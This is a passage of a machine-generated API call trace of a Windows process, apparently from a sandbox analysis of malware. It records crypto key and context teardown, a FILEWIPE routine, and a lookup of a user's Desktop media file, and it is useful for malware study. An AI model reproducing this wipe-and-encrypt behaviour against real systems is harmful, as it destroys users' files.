wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0075.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.943] CryptDestroyKey (hKey=0x6b8b78) returned 1 [0075.944] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.944] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.944] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.944] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.944] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.944] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.944] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.944] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.944] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.945] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.945] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.945] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.945] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.945] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.945] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.945] CryptReleaseContext (hProv=0x6969c0, dwFlags=0x0) returned 1 [0075.945] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.945] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.945] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.945] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.945] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.945] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.945] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.947] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.947] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.947] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.947] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.949] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.949] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xb42994b0, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x0, dwReserved1=0x657690, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 0x6b89f8 [0075.950] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.950] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.950] CharLowerBuffW (in: lpsz="byte[45765]", cchLength=0xb | out: lpsz="byte[45765]") returned 0xb [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.951] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0075.951] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.951] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.951] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.951] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.952] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.952] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.952] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.953] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.953] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb588, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.953] GetProcAddress (hModule=0x76f90000, lpProcName="memset") returned 0x76f99790 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.954] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.954] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.955] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.955] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.955] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.955] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.955] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.955] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0075.956] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 